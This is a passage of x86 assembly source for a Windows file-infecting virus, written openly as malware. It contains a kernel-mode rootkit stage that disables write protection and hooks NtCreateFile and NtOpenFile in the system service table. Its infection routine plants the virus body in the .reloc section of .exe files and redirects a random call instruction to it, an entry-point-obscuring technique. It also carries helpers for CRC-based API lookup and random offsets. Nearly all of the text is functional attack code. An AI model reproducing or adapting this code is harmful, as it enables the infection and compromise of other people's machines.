;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;Entry Point Of Virus when is executed in ring0. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; EPointSystem: ;Ring0 Code ;;;;;;;;;;;;; push 00000000h ;This space in stack will be filled with the entry point ;address of win32k.sys pushfd pushad ;;;;;;;;;;;;;;;;;;;;;;;; callz R0_Doff ;i calculate delta offset. R0_Doff: pop ebp sub ebp,offset R0_Doff ;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;; lea eax,[ebp + EPointSystem] ;our target is to search image base of win32k.sys in memory. xor ax,ax ;hardcoded would be 0A0000000h in my system. add eax,1000h SearchBaseImage: sub eax,1000h cmp word ptr [eax],'ZM' jne SearchBaseImage ;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;; mov ebx,[ebp + EntryPointWin32ksys] ;We have the old entry point and the image base add ebx,eax ;so we have the entry point address. We put mov [esp + cPushad + cPushfd],ebx ;that entry point after pushad and pushfd bytes ;;;;;;;;;;;;;;;;;;;;;;;; ;in stack for using ret instruction later and ;for jumping entry point of win32k.sys ;;;;;;;;;;;;;;;;;;;;;;;; mov eax,[esp + cPushad + cPushfd + 4] ;address in stack of a zone of ntoskrnl(in function xor ax,ax ;ExCreateCallback).With this address we will get add eax,1000h ;ntoskrnl base addr ;eax -> a part of ntoskrnl SearchNtoskrnl: sub eax,1000h cmp word ptr [eax],'ZM' jne SearchNtoskrnl ;eax -> base of ntoskrnl mov [ebp + Ntoskrnl],eax ;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;; ;now we will get somethings that will be useful for hooking NtCreateFile...SSDT address, ;syscall number of NtCreateFile, .... ;There is a undocumented entry in the export table of ntoskrnl, KeServiceDescriptorTable, ;and this entry is the key for accessing the system service dispatch table where we must ;patch for hooking a service(NtCreateFile for example ;) ;KeServiceDescriptorTable points to a structure like this: ; { ; DWORD ServiceTableBase - pointer to system service dispatch table(SSDT) ; DWORD ServiceCounterTable - not important for us ; DWORD NumberOfServices - number of services in system service dispatch table ; DWORD ParamTableBase - pointer to system service parameter table(SSPT) ; } ; ;We want to get the number of the NtCreateFile service and then we search in this table ;and we patch the address of NtCreateFile rutine with a address of our code ;;;;;;;;;;;;;;;;;;;;;;;; ;eax = ntoskrnl base GezApi eax,KeServiceDescriptorTableCRC,KSDTNameLen mov [ebp + KeServiceDescriptorTable],eax ;;;;;;;;;;;;;;;;;;;;;;;; ;ill get SSDT from that service descriptor table ;;;;;;;;;;;;;;;;;;;;;;;; mov eax,[eax] mov [ebp + SSDT],eax ;;;;;;;;;;;;;;;;;;;;;;;; ;now ill get from ntoskrnl the addr of NtCreateFile ;;;;;;;;;;;;;;;;;;;;;;;; mov eax,[ebp + Ntoskrnl] GezApi eax,NtCreateFileCRC,NCFNameLen mov [ebp + NtCreateFileAddr],eax ;;;;;;;;;;;;;;;;;;;;;;;; ;Ill get service ID from ZwCreateFile ;;;;;;;;;;;;;;;;;;;;;;;; mov eax,[ebp + Ntoskrnl] GezSyscall eax,ZwCreateFileCRC,ZCFNameLen ;;;;;;;;;;;;;;;;;;;;;;;; ;now ill search in the SSDT the address of the entry of NtCreateFile where we will hook ;;;;;;;;;;;;;;;;;;;;;;;; mov ebx,[ebp + SSDT] ;ebx + eax*4 -> entry shl eax,2 add ebx,eax ;ebx -> entry mov [ebp + NtCreateFileEntryAddr],ebx ;;;;;;;;;;;;;;;;;;;;;;;; ;and with NtOpenFile same thing ;;;;;;;;;;;;;;;;;;;;;;;; mov eax,[ebp + Ntoskrnl] GezApi eax,NtOpenFileCRC,NOFNameLen mov [ebp + NtOpenFileAddr],eax ;;;;;;;;;;;;;;;;;;;;;;;; ;Ill get service ID from ZwOpenFile ;;;;;;;;;;;;;;;;;;;;;;;; mov eax,[ebp + Ntoskrnl] GezSyscall eax,ZwOpenFileCRC,ZOFNameLen ;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;; mov ebx,[ebp + SSDT] ;ebx + eax*4 -> entry shl eax,2 add ebx,eax ;ebx -> entry mov [ebp + NtOpenFileEntryAddr],ebx ;;;;;;;;;;;;;;;;;;;;;;;; ;We hook NtCreateFile and NtOpenFile ;;;;;;;;;;;;;;;;;;;;;;;; mov eax,cr0 ;we set write protect flag to 1, and in this push eax ;supervision of writing readonly mem is disabled or eax,00010000h ;We do this for writing SSDT coz is possible (under mov cr0,eax ;XP is default) SSDT is read only. ;(Thx Ratter ;) ;;;;;;;;;;;;;;;;;;;;;;;; ;;; ;Note in the next inst we get the service ID of NtCreateFile and NtOpenFile from Zws funcions ;of them. I got it searching NtCreateFile and NtOpenFile in ntoskrnl and scanning SSDT ;comparing with entrys and when is the same value that is the entry.Ratter said me the problem ;of this: NtOpenFile or NtCreateFile could be previosly hooked and with this method this ;will not work( Thx again Ratter :) ;;;;;;;;;;;;;;;;;;;;;;;; mov ebx,[ebp + NtCreateFileEntryAddr] lea eax,[ebp + NtCreateFileHookRutine] mov [ebx],eax ;in this moment we HOOK NtCreateFile ;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;; mov ebx,[ebp + NtOpenFileEntryAddr] lea eax,[ebp + NtOpenFileHookRutine] mov [ebx],eax ;in this moment we HOOK NtOpenFile ;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;; pop eax ;we restore WP flag to original value mov cr0,eax ;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;; callz GetApisRing0 ;ill get some apis for no calling all time GezApi ;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;; callz DeleteWin32ksy ;i must delete win32k.sy if still not deleted ;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;; callz PayloadRing0 ;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;; ReturnWin32ksys: popad popfd ret ;previosly i moved entry point adress of win32k.sys at position in stack ;so this ret will fill eip with start point of win32k.sys ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; NtOpenFileHookRutine: ;;;;;;;;;;;;;;;;;;;;; pushfd pushad ;;;;;;;;;;;;;;;;;;;;;;;; callz doff_hookOF ;delta offset doff_hookOF: pop ebp sub ebp,offset doff_hookOF ;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;; mov eax,[ebp + NtOpenFileAddr] mov [ebp + HookRealAddr],eax ;we put the jump to real code of NtOpenFile ;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;; jmpz GeneralCodeForInfectionRing0 ;;;;;;;;;;;;;;;;;;;;;;;; ;NTSTATUS NtOpenFile( ; OUT PHANDLE FileHandle, ; IN ACCESS_MASK DesiredAccess, ; IN POBJECT_ATTRIBUTES ObjectAttributes, ; OUT PIO_STATUS_BLOCK IoStatusBlock, ; IN ULONG ShareAccess, ; IN ULONG OpenOptions ; ); ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;; NtCreateFileHookRutine: pushfd pushad ;;;;;;;;;;;;;;;;;;;;;;;; callz doff_hookCF ;delta offset doff_hookCF: pop ebp sub ebp,offset doff_hookCF ;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;; mov eax,[ebp + NtCreateFileAddr] mov [ebp + HookRealAddr],eax ;we put the jump to real code of NtCreateFile ;;;;;;;;;;;;;;;;;;;;;;;; ;NTSTATUS NtCreateFile( ; OUT PHANDLE FileHandle, ; IN ACCESS_MASK DesiredAccess, ; IN POBJECT_ATTRIBUTES ObjectAttributes, ; OUT PIO_STATUS_BLOCK IoStatusBlock, ; IN PLARGE_INTEGER AllocationSize OPTIONAL, ; IN ULONG FileAttributes, ; IN ULONG ShareAccess, ; IN ULONG CreateDisposition, ; IN ULONG CreateOptions, ; IN ULONG EaBuffer OPTIONAL, ; IN ULONG EaLength ; ); ; ;this only for NtCreateFile: ;;;;;;;;;;;;;;;;;;;;;;;; ;i get some datas from parameters mov eax,[esp + cPushad + cPushfd + 4 + 14h] mov [ebp + AttributesFileRing0],eax ;i get the attributes of file mov eax,[esp + cPushad + cPushfd + 4 + 1ch] mov [ebp + CreateDispositionFileRing0],eax ;i get manner for opening the file mov eax,[esp + cPushad + cPushfd + 4 + 20h] mov [ebp + CreateOptionsFileRing0],eax ;i get some more flags relative ;;;;;;;;;;;;;;;;;;;;;;;; ;to manner of opening the file ;;;;;;;;;;;;;;;;;;;;;;;; ;I want a existing file non directory test dword ptr [ebp + CreateDispositionFileRing0],FILE_OPEN jz StopInfectionRing0 ;test dword ptr [ebp + CreateOptionsFileRing0],FILE_NON_DIRECTORY_FILE ;jz StopInfectionRing0 ;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;; ;jmpz GeneralCodeForInfectionRing0 ;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; GeneralCodeForInfectionRing0: ;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;; callz UnhookWhile ;ill unhook apis while hooking rutine coz for example ;;;;;;;;;;;;;;;;;;;;;;;; ;if we call ZwOpenFile we will go to a infinite loop ;OBJECT_ATTRIBUTES { ; ULONG Length; ; PUNICODE_STRING ObjectName; ; HANDLE RootDirectory; ; PSECURITY_DESCRIPTOR SecurityDescriptor; ; PSECURITY_QUALITY_OF_SERVICE SecurityQualityOfService; ; ULONG Attributes; ; } ; ;UNICODE_STRING { ; USHORT Length; ;len in bytes of Buffer ; USHORT MaximumLength; ; PWSTR Buffer; ; } ;note if RootDirectory parameter is null,ObjectName has a fully qualified file specification, ;path+name,but if RootDirectory is non null,then ObjectName has only the name of the object ;relative to RootDirectory directory. ;when we call NtOpenFile we must use both RootDirectory and ObjectName. ;;;;;;;;;;;;;;;;;;;;;;;; ;Ill get the file name of the file i want to infect mov edi,[esp + cPushad + cPushfd + 4 + 8] ;edi -> ObjectAttributes mov eax,[edi + 4] ;eax = RootDirectory mov [ebp + RootDirectoryRing0],eax mov esi,[edi + 8] ;esi -> unicode string of the name mov eax,[esi] mov dword ptr [ebp + FileNameRing0],eax lea edi,[ebp + StringRing0] ;edi -> our buffer for unicode string of name mov dword ptr [ebp + FileNameRing0 + 4],edi movzx ecx,word ptr [esi] ;ecx = long of unicode string mov esi,[esi + 4] rep movsb ;i copy the buffer ;;;;;;;;;;;;;;;;;;;;;;;; ;vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv |quitar esto| vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv movzx ecx,word ptr [ebp + FileNameRing0] mov eax,dword ptr [ebp + FileNameRing0 + 4] add eax,ecx dec eax dec eax cmp byte ptr [eax],'e' jne StopInfectionRing0 dec eax dec eax cmp byte ptr [eax],'x' jne StopInfectionRing0 dec eax dec eax cmp byte ptr [eax],'e' jne StopInfectionRing0 dec eax dec eax cmp byte ptr [eax],'.' jne StopInfectionRing0 dec eax dec eax cmp byte ptr [eax],'z' jne StopInfectionRing0 dec eax dec eax cmp byte ptr [eax],'z' jne StopInfectionRing0 dec eax dec eax cmp byte ptr [eax],'z' jne StopInfectionRing0 ;^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ |quitar esto| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ;;;;;;;;;;;;;;;;;;;;;;;; movzx ecx,word ptr [ebp + FileNameRing0] ;I test if file is a .exe file mov eax,dword ptr [ebp + FileNameRing0 + 4] add eax,ecx dec eax dec eax or byte ptr [eax],20h cmp byte ptr [eax],'e' jne StopInfectionRing0 dec eax dec eax or byte ptr [eax],20h cmp byte ptr [eax],'x' jne StopInfectionRing0 dec eax dec eax or byte ptr [eax],20h cmp byte ptr [eax],'e' jne StopInfectionRing0 dec eax dec eax cmp byte ptr [eax],'.' jne StopInfectionRing0 ;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;; callz MapFileRing0 ;map the file for infection ;) or eax,eax jz StopInfectionRing0 ;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;; mov ebx,eax ;ebx = Base of Mapped File cmp word ptr [ebx],'ZM' jne CloseAndStopInfectionRing0 mov edi,[ebx + 3ch] add edi,ebx ;edi -> PE cmp word ptr [edi],'EP' jne CloseAndStopInfectionRing0 cmp word ptr [edi + 8],'zs' je CloseAndStopInfectionRing0 ;is it already infected? mov ax,word ptr [edi + 16h] test ax,00000002h ;yes IMAGE_FILE_EXECUTABLE_IMAGE je CloseAndStopInfectionRing0 test ax,00001000h ;no IMAGE_FILE_SYSTEM jne CloseAndStopInfectionRing0 test ax,00002000h ;no IMAGE_FILE_DLL jne CloseAndStopInfectionRing0 mov ax,[edi + 5ch] test ax,00000001h ;no IMAGE_SUBSYSTEM_NATIVE jne CloseAndStopInfectionRing0 ;ebx->MZ ;edi->PE ;;;;;;;;;;;;;;;;;;;;;;;; ;we will search EPoint of file mov edx,[edi + 28h] ;edx = RVA epoint,we need the pointer to raw data movzx ecx,word ptr [edi + 6] mov eax,edi add eax,0F8h-28h ;sections inc ecx GoToSectionEPointInfectionRing0: dec ecx or ecx,ecx jz CloseAndStopInfectionRing0 add eax,28h cmp dword ptr [eax.IMAGE_SECTION_HEADER.SH_VirtualAddress],edx jnle GoToSectionEPointInfectionRing0 mov esi,dword ptr [eax.IMAGE_SECTION_HEADER.SH_VirtualAddress] add esi,dword ptr [eax.IMAGE_SECTION_HEADER.SH_SizeOfRawData] cmp edx,esi jnl GoToSectionEPointInfectionRing0 ;eax->.text section header mov dword ptr [ebp + textSecHeader],eax ;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;; ;now we will search relocs section mov edx,[edi.IMAGE_NT_HEADERS.NT_OptionalHeader.OH_DirectoryEntries.DE_BaseReloc.DD_VirtualAddress] movzx ecx,word ptr [edi + 6] mov eax,edi add eax,0F8h-28h ;sections inc ecx GoToSectionRelocInfectionRing0: dec ecx or ecx,ecx jz CloseAndStopInfectionRing0 add eax,28h cmp dword ptr [eax.IMAGE_SECTION_HEADER.SH_VirtualAddress],edx jnle GoToSectionRelocInfectionRing0 mov esi,dword ptr [eax.IMAGE_SECTION_HEADER.SH_VirtualAddress] add esi,dword ptr [eax.IMAGE_SECTION_HEADER.SH_SizeOfRawData] cmp edx,esi jnl GoToSectionRelocInfectionRing0 ;eax->.reloc section header mov dword ptr [ebp + relocSecHeader],eax ;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;; ;ebx->MZ ;edi->PE mov [ebp + HostMZ],ebx mov [ebp + HostPE],edi ;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;; ;Getting a offset for the virus mov eax,[eax.IMAGE_SECTION_HEADER.SH_SizeOfRawData] push eax call randRing0 ;eax = rand value 0...(size of reloc section)/2 pop edx sub edx,eax ;edx = size for vx cmp edx,tamvirus jb CloseAndStopInfectionRing0 mov edx,[ebp + relocSecHeader] mov edx,[edx.IMAGE_SECTION_HEADER.SH_PointerToRawData] add edx,eax mov [ebp + OffsetVirus],edx ;we will put the virus in reloc section + rand value ;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;; ;Getting RVA virus mov ebx,[ebp + relocSecHeader] mov edx,[ebx.IMAGE_SECTION_HEADER.SH_PointerToRawData] mov eax,[ebx.IMAGE_SECTION_HEADER.SH_VirtualAddress] sub eax,edx mov edx,[ebp + OffsetVirus] add edx,eax mov [ebp + RVAVirus],edx ;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;; ;Erasing RVA and size in data directory for relocs mov edi,[ebp + HostPE] mov dword ptr [edi.IMAGE_NT_HEADERS.NT_OptionalHeader.OH_DirectoryEntries.DE_BaseReloc.DD_VirtualAddress],00000000h mov dword ptr [edi.IMAGE_NT_HEADERS.NT_OptionalHeader.OH_DirectoryEntries.DE_BaseReloc.DD_Size],00000000h ;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;; mov eax,[ebp + textSecHeader] mov edx,[eax.IMAGE_SECTION_HEADER.SH_PointerToRawData] push edx mov eax,[eax.IMAGE_SECTION_HEADER.SH_SizeOfRawData] add edx,eax add edx,dword ptr [ebp + HostMZ] mov [ebp + TextSecEnd],edx call randRing0 pop edx ;edx = PointerToRawData Text Section ;eax = rand value 0...SizeOfRawData/2 add edx,eax add edx,dword ptr [ebp + HostMZ] ;;;;;;;;;;;;;;;;;;;;;;;; ;Super's Theory: ; ; When u jump a random number of bytes in a buffer of code its possible u will ; jump to a zone between instruction. For example: E8 11 22 33 44 its possible ; in a random jump you will stay pointing 11 or 22 instead instruction opcode E8. ; but its possible redrive ur pointer to opcodes doing a route over the code ; getting instruction lengths and adding them to your pointer, 16 times at max. ; Then u will be in opcodes sure. ;edx = pointer ;;;;;;;;;;;;;;;;;;;;;;;; lea eax,[ebp + tbl] push eax call disasm_init pop eax;clean stack RedrivePointer: inc edx mov eax,dword ptr [ebp + TextSecEnd] sub eax,50 cmp eax,edx jl CloseAndStopInfectionRing0 mov ecx,16 goodInsContinue: push edx lea eax,[ebp + tbl] push eax call disasm_main pop esi pop esi add edx,eax or eax,eax jz RedrivePointer mov eax,dword ptr [ebp + TextSecEnd] sub eax,50 cmp eax,edx jl CloseAndStopInfectionRing0 loop goodInsContinue ;;;;;;;;;;;;;;;;;;;;;;;; ;well,if all was as we want,we are pointing to a good opcode ;;;;;;;;;;;;;;;;;;;;;;;; mov ebx,edx call SearchCall or eax,eax jz CloseAndStopInfectionRing0 ;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;; ;ebx -> E8 XX XX XX XX ;the VA of the call is ebx + 5 + (XX XX XX XX) mov edx,[ebp + textSecHeader] mov eax,[edx.IMAGE_SECTION_HEADER.SH_VirtualAddress] sub eax,[edx.IMAGE_SECTION_HEADER.SH_PointerToRawData] add eax,ebx sub eax,[ebp + HostMZ] ;eax RVA of E8 XX XX XX XX push eax add eax,[ebx + 1] add eax,5 ;eax = RVA of call pointing addr ;we will put in EntryPoint variable the VA of the call. When ring3 part of virus returned ;to host it will jmp to the content of this variable. mov edi,[ebp + HostPE] add eax,[edi.IMAGE_NT_HEADERS.NT_OptionalHeader.OH_ImageBase] ;eax=VA of call pointing addr mov [ebp + EntryPoint],eax pop eax ;eax RVA of E8 XX XX XX XX mov edx,[ebp + RVAVirus] add eax,5 sub edx,eax ;we patch the call for pointing our code mov [ebx+1],edx ;if all well,the call is calling the virus,and the virus will pass the control where the ;call was calling before patching...EPO ;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;; ;the virus will be writed in the host,at offset = OffsetVirus ;we must search a call for patching with a call to virus mov edx,[ebp + HostMZ] ;MZ mov ebx,[ebp + HostPE] ;PE mov edi,edx add edi,[ebp + OffsetVirus] lea esi,[ebp + svirus] mov ecx,tamvirus rep movsb mov word ptr [ebx + 8],'zs' ;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;; CloseAndStopInfectionRing0: ;close and bye callz CloseAllRing0 ;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;; StopInfectionRing0: callz RehookAgain popad popfd push 12345678h HookRealAddr = dword ptr $ - 4 ret ;;;;;;;;;;;;;;;;;;;;;;;; textSecHeader dd 0 relocSecHeader dd 0 relocRVA dd 0 OffsetVirus dd 0 HostMZ dd 0 HostPE dd 0 RVAVirus dd 0 TextSecEnd dd 0 ;;;;;;;;;;;;;;;;;;;;;;;; ;randRing0: this funcion will generate a ramdom number gived a size ;parameters: ; eax = size The number will be generated 0...size randRing0: push eax mov eax,[ebp + Ntoskrnl] GezApi eax,KeQueryTickCountCRC,KQTCNameLen lea ebx,[ebp + randvalue] push ebx call eax mov edx,[ebp + randvalue] pop eax ;eax = size ;edx = TickCount and edx,000000FFh mov ecx,edx shl ecx,8 or edx,ecx mov ecx,edx shl ecx,16 or edx,ecx and edx,eax cmp edx,eax jg randRing0 mov eax,edx shr eax,1 ret randvalue dd 0 ;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;; ;randRing3: this funcion will generate a ramdom number gived a size ;parameters: ; eax = size The number will be generated 0...size randRing3: push eax mov eax,[ebp + NtKernel] GezApi eax,GetTickCountCRC,GTCNameLen call eax mov edx,eax pop eax ;eax = size ;edx = TickCount and edx,000000FFh mov ecx,edx shl ecx,8 or edx,ecx mov ecx,edx shl ecx,16 or edx,ecx and edx,eax cmp edx,eax jg randRing3 mov eax,edx shr eax,1 ret ;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;FUNCTIONS;;;;;;;;;;;;; ;;;;;;;;FUNCTIONS;;;;;;;;;;;;; ;;;;;;;;FUNCTIONS;;;;;;;;;;;;; ;;;;;;;;FUNCTIONS;;;;;;;;;;;;; ;;;;;;;;FUNCTIONS;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;SECOND VERSION IMPROVEMENT: we will add zombie length disassembler engine for getting ;a good EPO infection :D (thx z0mbie...we didnt say u if we could to use your lde but ;we thought this is a good purpose so you would be agree ;) include lde32bin.inc ; LDE32 code ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;SearchCall: this function will search a call instruction given a buffer with code. ;in:ebx->buffer with code ; ;The function will return eax = 0 if error ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; SearchCall: lea esi,[ebp + tbl] push esi call disasm_init pop esi;clean stack xor eax,eax LoopSearchCall: inc eax or eax,eax jz FoundCall cmp byte ptr [ebx],0E8h je FoundCall push ebx lea esi,[ebp + tbl] push esi call disasm_main pop esi pop esi add ebx,eax jmp LoopSearchCall FoundCall: ret tbl db 2048 dup (?) ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; ;CRC32 rutine(from Billy Belcebu tutorial)...i have not said him nothing about i have take ;his rutine but i dont know him...in addition i have seen this rutine in other viruses ;so i think he doesnt go angry if i use it :) ; ;in:esi -> start of buffer ; edi = size of buffer ;out: ; eax = cksum ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; CRC32: cld xor ecx,ecx dec ecx mov edx,ecx NextByteCRC: xor eax,eax xor ebx,ebx lodsb xor al,cl mov cl,ch mov ch,dl mov dl,dh mov dh,8 NextBitCRC: shr bx,1 rcr ax,1 jnc NoCRC xor ax,08320h xor bx,0EDB8h NoCRC: dec dh jnz NextBitCRC xor ecx,eax xor edx,ebx dec edi jnz NextByteCRC not edx not ecx mov eax,edx rol eax,16 mov ax,cx ret ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; ;GetApi gets a api address from its crc. ;in: ; eax -> base of dll ; edx = the crc32 of api to search. ; ebx = api name len. ;out: ; eax -> function ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; GetApi: ;eax -> base of dll ;ebx = len api name ;edx = crc of api name push ebx ecx edx esi edi push eax mov eax,[eax + 3ch] add eax,dword ptr [esp] ;eax -> PE mov eax,[eax + 78h] add eax,dword ptr [esp] ;eax -> Export table push eax push ebx mov ebx,[eax + 20h] add ebx,dword ptr [esp + 8] ;ebx -> Name of functions push ebx sub ebx,4 SearchApiByCRC: add ebx,4 mov esi,[ebx] add esi,dword ptr [esp + 12] CalcLenString ;ecx = length api.name mov edi,[esp + 4] cmp edi,ecx jne SearchApiByCRC mov edi,ecx push ebx push edx callz CRC32 pop edx pop ebx cmp eax,edx jne SearchApiByCRC pop edi ;edi -> name of functions ;ebx -> name of functions + (index of our api * 4) sub ebx,edi mov eax,ebx xor edx,edx mov ebx,4 div ebx ;eax = index of our api pop ebx pop ebx ;ebx -> export mov ecx,[ebx + 24h] add ecx,dword ptr [esp] ;ecx -> name ordinals rol eax,1 add ecx,eax mov ecx,[ecx] shr ecx,10h dec ecx ;ecx = ordinal mov eax,[ebx + 1ch] add eax,dword ptr [esp] ;eax -> address of functions rol ecx,2 add eax,ecx mov eax,[eax] add eax,dword ptr [esp] ;eax = address of function searched pop ebx pop edi edi edx ecx ebx ret ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; ;UnprotectMem sets as writable zone since esi to esi + ecx in ebx process. ;in: ; eax -> base of kernel ; esi -> dir of memory that will be writable. ; ecx -> bytes of that memory. ; ebx -> handle of the process where is the memory.If 0 this process ; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; UnprotectMem: or ebx,ebx jne NoThisProcess push eax push esi push ecx GezApi eax,GetCurrentProcessCRC,GCPNameLen ;eax -> GetCurrentProcess call eax ;eax = hand of this process mov ebx,eax pop ecx pop esi pop eax NoThisProcess: push ebx push esi push ecx GezApi eax,VirtualProtectExCRC,VPNameLen ;eax -> VirtualProtectEx pop ecx pop esi pop ebx ;ebx = hand of process ;esi = dir ;ecx = nbytes push eax ;space for receiving lpflOldProtect out parameter push esp push PAGE_EXECUTE_READWRITE push ecx push esi push ebx call eax pop eax ;we remove space that we reserve in the stack for out parameter ret ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;GetLibrarys and FreeLibrarys get and free some librarys :P ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; GetLibrarys: pushad ;first,ill try to get ntdll base from PEB structure mov eax,dword ptr fs:[30h] ;PEB pointer mov eax,dword ptr [eax + 0ch] ;PEB_LDR_DATA mov eax,dword ptr [eax + 1ch] ;LIST_ENTRY mov eax,dword ptr [eax + 8h] ;ntdll.dll base 